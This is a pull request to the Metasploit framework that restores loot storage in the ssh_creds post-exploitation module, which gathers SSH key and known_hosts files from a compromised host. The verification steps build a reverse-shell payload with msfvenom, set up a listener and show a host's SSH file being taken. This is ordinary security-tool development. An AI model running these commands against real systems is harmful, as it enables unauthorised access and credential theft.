### PR TITLE
Fix #5134, Put store_loot back for ssh_creds.rb

### DIFF
--- a/modules/post/multi/gather/ssh_creds.rb
+++ b/modules/post/multi/gather/ssh_creds.rb
@@ -61,7 +61,8 @@ class Metasploit3 < Msf::Post
         data = read_file("#{path}#{sep}#{file}")
         file = file.split(sep).last
 
-        print_good("Downloaded #{path}#{sep}#{file}")
+        loot_path = store_loot("ssh.#{file}", "text/plain", session, data, "ssh_#{file}", "OpenSSH #{file} File")
+        print_good("Downloaded #{path}#{sep}#{file} -> #{loot_path}")
 
         begin
           key = SSHKey.new(data, :passphrase => "")


### PR DESCRIPTION
Fix #5134

store_loot was used at one point, but we ended up removing it. Turns out store_loot is handy in some cases so we're bringing it back.
## Verification
- [x] Prepare a Ubuntu box with SSH
- [x] Do: `./msfvenom -p linux/x86/shell_reverse_tcp lhost=[Your IP] lport=4444 -f elf -o /tmp/test.bin`
- [x] Copy /tmp/test.bin to your Ubuntu box
- [x] Set up a multi/handler like this:

```
msf > use exploit/multi/handler 
msf exploit(handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(handler) > set exitonsession false
exitonsession => false
msf exploit(handler) > set lhost 192.168.1.64
lhost => 192.168.1.64
msf exploit(handler) > run -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.64:4444 
msf exploit(handler) > [*] Starting the payload handler...
```
- [x] Run test.bin and get a session
- [x] Run the post module like this:

```
msf exploit(handler) > use post/multi/gather/ssh_creds 
msf post(ssh_creds) > set session 1
session => 1
msf post(ssh_creds) > run

[*] Finding .ssh directories
[*] Looting 1 directories
[+] Downloaded /home/sinn3r/.ssh/known_hosts -> /Users/sinn3r/.msf4/loot/20150417164122_default_192.168.1.151_ssh.known_hosts_725973.txt
[-] Could not load SSH Key: Neither PUB key nor PRIV key
[*] Post module execution completed
msf post(ssh_creds) > 
```
- [x] Cat the stolen file saved in the loot directory, it should not be empty
